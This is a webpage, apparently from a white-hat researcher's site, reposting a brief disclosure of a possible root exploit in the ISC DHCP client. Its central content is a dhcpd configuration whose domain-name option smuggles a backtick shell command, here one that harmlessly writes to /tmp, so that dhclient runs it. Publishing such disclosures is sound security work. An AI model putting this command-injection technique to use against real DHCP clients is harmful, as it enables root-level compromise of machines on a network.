Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

 

 

isc-dhcpd.exploit.txt
isc-dhcpd.exploit.txt
isc-dhcpd.exploit.txt

Somebody at OpenBSD discovered a possible root exploit in the isc-dhcpd.exploit.txt

Somebody at OpenBSD discovered a possible root exploit in the ISC DHCP
client.

I can confirm that as of 6:23am on June 23rd after several hours of
hacking around the sources I had the following dhcpd config running on my
own machine's private network for testing:

shared-network LOCAL-NET {
option domain-name "my.`echo hi > /tmp/oops`.domain";
option domain-name-servers 192.168.1.3, 192.168.1.5;

subnet 192.168.1.0 netmask 255.255.255.0 {
option routers 192.168.1.1;

range 192.168.1.32 192.168.1.127;
}
}

... and when dhclient finished running I had a nice little present
in /tmp/ named 'oops' that contained the string 'hi' ..
Social Media Share